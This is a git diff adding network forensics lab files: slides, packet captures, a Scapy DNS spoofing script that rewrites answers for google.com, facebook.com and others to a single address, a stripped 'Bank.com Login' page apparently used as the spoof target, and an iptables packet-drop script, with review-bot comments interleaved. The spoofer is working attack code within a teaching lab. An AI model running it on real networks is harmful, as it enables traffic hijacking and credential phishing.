diff --git a/Networking_Forensics/40_ARP_Poisoning_Forensics.pptx b/Networking_Forensics/40_ARP_Poisoning_Forensics.pptx
index 0242121..7846ee8 100644
Binary files a/Networking_Forensics/40_ARP_Poisoning_Forensics.pptx and b/Networking_Forensics/40_ARP_Poisoning_Forensics.pptx differ
diff --git a/Networking_Forensics/50_Firewall_Drop.pptx b/Networking_Forensics/50_Firewall_Drop.pptx
new file mode 100644
index 0000000..02ade32
Binary files /dev/null and b/Networking_Forensics/50_Firewall_Drop.pptx differ
diff --git a/Networking_Forensics/70_DNS.pptx b/Networking_Forensics/70_DNS.pptx
new file mode 100644
index 0000000..a1cc519
Binary files /dev/null and b/Networking_Forensics/70_DNS.pptx differ
diff --git a/Networking_Forensics/80_DNS_Spoof_Forensics.pptx b/Networking_Forensics/80_DNS_Spoof_Forensics.pptx
new file mode 100644
index 0000000..e18375d
Binary files /dev/null and b/Networking_Forensics/80_DNS_Spoof_Forensics.pptx differ
diff --git a/Networking_Forensics/lab_files/dns/dig_dns.pcap b/Networking_Forensics/lab_files/dns/dig_dns.pcap
new file mode 100644
index 0000000..6609665
Binary files /dev/null and b/Networking_Forensics/lab_files/dns/dig_dns.pcap differ
diff --git a/Networking_Forensics/lab_files/dns/http_dns.pcap b/Networking_Forensics/lab_files/dns/http_dns.pcap
new file mode 100644
index 0000000..690abc5
Binary files /dev/null and b/Networking_Forensics/lab_files/dns/http_dns.pcap differ
diff --git a/Networking_Forensics/lab_files/dns/http_ub_dns.pcap b/Networking_Forensics/lab_files/dns/http_ub_dns.pcap
new file mode 100644
index 0000000..3517ce7
Binary files /dev/null and b/Networking_Forensics/lab_files/dns/http_ub_dns.pcap differ
diff --git a/Networking_Forensics/code/arp.py b/Networking_Forensics/lab_files/dns_spoof/arp.py
similarity index 100%
rename from Networking_Forensics/code/arp.py
rename to Networking_Forensics/lab_files/dns_spoof/arp.py
diff --git a/Networking_Forensics/lab_files/dns_spoof/dns_spoof.py b/Networking_Forensics/lab_files/dns_spoof/dns_spoof.py
new file mode 100644
index 0000000..f348b85
--- /dev/null
+++ b/Networking_Forensics/lab_files/dns_spoof/dns_spoof.py
@@ -0,0 +1,64 @@
+# https://www.geeksforgeeks.org/how-to-make-a-dns-spoof-attack-using-scapy-in-python/
+# https://www.thepythoncode.com/article/make-dns-spoof-python
+import os
+import logging as log
+from scapy.all import IP, DNSRR, DNS, UDP, DNSQR
+from netfilterqueue import NetfilterQueue
+
+
+class DnsSnoof:
+ def __init__(self, hostDict, queueNum):
+ self.hostDict = hostDict
+ self.queueNum = queueNum
+ self.queue = NetfilterQueue()
+
+ def __call__(self):
+ log.info("Snoofing....")
+ os.system(
+ f'iptables -I FORWARD -j NFQUEUE --queue-num {self.queueNum}')
+ self.queue.bind(self.queueNum, self.callBack)
+ try:
+ self.queue.run()
+ except KeyboardInterrupt:
+ os.system(
+ f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')
+ log.info("[!] iptable rule flushed")
+
+ def callBack(self, packet):
+ scapyPacket = IP(packet.get_payload())
+ if scapyPacket.haslayer(DNSRR):
+ try:
+ log.info(f'[original] { scapyPacket[DNSRR].summary()}')
+ queryName = scapyPacket[DNSQR].qname
+ if queryName in self.hostDict:
+ scapyPacket[DNS].an = DNSRR(
+ rrname=queryName, rdata=self.hostDict[queryName])
+ scapyPacket[DNS].ancount = 1
+ del scapyPacket[IP].len
+ del scapyPacket[IP].chksum
+ del scapyPacket[UDP].len
+ del scapyPacket[UDP].chksum
+ log.info(f'[modified] {scapyPacket[DNSRR].summary()}')
+ else:
+ log.info(f'[not modified] { scapyPacket[DNSRR].rdata }')
+ except IndexError as error:
+ log.error(error)
+ packet.set_payload(bytes(scapyPacket))
+ return packet.accept()
+
+
+if __name__ == '__main__':
+ try:
+ hostDict = {
+ b"google.com.": "136.160.215.15",
+ b"facebook.com.": "136.160.215.15",
+ b"ubalt.com.": "136.160.215.15",
+ b"g00gle.com.": "136.160.215.15",
+ }
+ queueNum = 1
+ log.basicConfig(format='%(asctime)s - %(message)s',
+ level = log.INFO)
+ snoof = DnsSnoof(hostDict, queueNum)
+ snoof()
+ except OSError as error:
+ log.error(error)
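Review bot: The FORWARD rule that `__call__` inserts is deleted only on KeyboardInterrupt, so any other failure inside `self.queue.run()` (or in `self.queue.bind(...)`, which sits before the `try`) leaves `-j NFQUEUE --queue-num N` in the chain after the process exits, and with no listener bound to that queue the lab gateway stops forwarding every packet until someone removes the rule by hand. Move the `bind` call inside the `try`, keep a narrow `except KeyboardInterrupt: pass`, and do the cleanup in a `finally:` block — `self.queue.unbind()` followed by `os.system(f'iptables -D FORWARD -j NFQUEUE --queue-num {self.queueNum}')` and the existing log line — so it runs on every exit path. `main()` in lab_files/firewall/iptables_handle_packets_drop.py in this same commit has the identical KeyboardInterrupt-only cleanup. The class also has no docstring; a short one stating that `callBack` intercepts DNS responses on the FORWARD chain and replaces the answer section for any qname present in `hostDict`, which is what the lab captures are meant to show, would help readers, and the `DnsSnoof`/`"Snoofing...."` spelling looks like a typo for "Spoof".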
diff --git a/Networking_Forensics/lab_files/dns_spoof/index.html b/Networking_Forensics/lab_files/dns_spoof/index.html new file mode 100644 index 0000000..1a03edd --- /dev/null +++ b/Networking_Forensics/lab_files/dns_spoof/index.html @@ -0,0 +1,21 @@ + + + + + Bank.com Login + + + +

Bank.com Login

+
+ +

+ + +

+ + +
+ + + \ No newline at end of file diff --git a/Networking_Forensics/lab_files/firewall/hello.html b/Networking_Forensics/lab_files/firewall/hello.html new file mode 100644 index 0000000..6f082c1 --- /dev/null +++ b/Networking_Forensics/lab_files/firewall/hello.html @@ -0,0 +1,13 @@ + + + + + Hello World + + + +

Hello World! Network Forensics.

+

Welcome to my simple web page.

+
+
+
\ No newline at end of file
diff --git a/Networking_Forensics/lab_files/firewall/iptables_handle_packets_drop.py b/Networking_Forensics/lab_files/firewall/iptables_handle_packets_drop.py
new file mode 100644
index 0000000..00638d4
--- /dev/null
+++ b/Networking_Forensics/lab_files/firewall/iptables_handle_packets_drop.py
@@ -0,0 +1,61 @@
+#!/usr/bin/env python3
+
+import argparse
+import os
+import signal
+import sys
+
+from netfilterqueue import NetfilterQueue
+from scapy.layers.inet import IP
+from scapy.sendrecv import send
+
+
+def iptables_add_rule(ip_address):
+ os.system(f"iptables -A INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
+
+
+def iptables_remove_rule(ip_address):
+ os.system(f"iptables -D INPUT -s {ip_address} -j NFQUEUE --queue-num 1")
+
+
+def handle_packet(packet):
+ ip = IP(packet.get_payload())
+ source_ip = ip.src
+ print(f"Receiving packet from {source_ip}")
+
+ if source_ip == args.source_ip:
+ print(f"Dropping packet from {source_ip}")
+ packet.drop()
+ print("================================")
+
+def parse_arguments():
+ parser = argparse.ArgumentParser(description="Python script to demonstrate iptables functions")
+ parser.add_argument("source_ip", help="Source IP address to filter")
+ return parser.parse_args()
+
+
+def main():
+ if os.geteuid() != 0:
+ print("You must be root to run this script.")
+ sys.exit(1)
+
+ global args
+ args = parse_arguments()
+
+ iptables_add_rule(args.source_ip)
+
+ q = NetfilterQueue()
+ q.bind(1, handle_packet)
+
+ try:
+ print("Waiting incoming packets...")
+ q.run()
+ except KeyboardInterrupt:
+ print("Exiting...")
+ q.unbind()
+ iptables_remove_rule(args.source_ip)
+ print("Rules are removed...")
+
+
+if __name__ == "__main__":
+ main()
diff --git a/Networking_Forensics/lab_files/firewall_forward/hello.html b/Networking_Forensics/lab_files/firewall_forward/hello.html
new file mode 100644
index 0000000..6f082c1
--- /dev/null
+++ b/Networking_Forensics/lab_files/firewall_forward/hello.html
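Review bot: `handle_packet` issues a verdict only when `source_ip == args.source_ip`; a queued packet that does not match gets neither `drop()` nor `accept()`, and as far as I can tell it then sits in the kernel queue without a verdict rather than being delivered. The INPUT rule does pre-filter on `-s`, but the comparison is a string compare against scapy's normalised `ip.src`, so an argument written in a different textual form (leading zeros, surrounding whitespace) would match the iptables rule yet fail the `==`, which is exactly the case that needs the `else: packet.accept()` branch. Since `args.source_ip` is also interpolated into an `os.system` shell string in `iptables_add_rule`/`iptables_remove_rule`, have `parse_arguments` reject anything that is not an address first, e.g. `ipaddress.ip_address(args.source_ip)  # raises ValueError on malformed input` after `parse_args()`, and prefer `subprocess.run([...], check=True)` over `os.system` so a failed iptables call is not silently ignored. `signal` and `send` are imported but unused, and `handle_packet` is followed by a single blank line where the rest of the file uses two.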
@@ -0,0 +1,13 @@ + + + + + Hello World + + + +

Hello World! Network Forensics.

+

Welcome to my simple web page.

+ + + \ No newline at end of file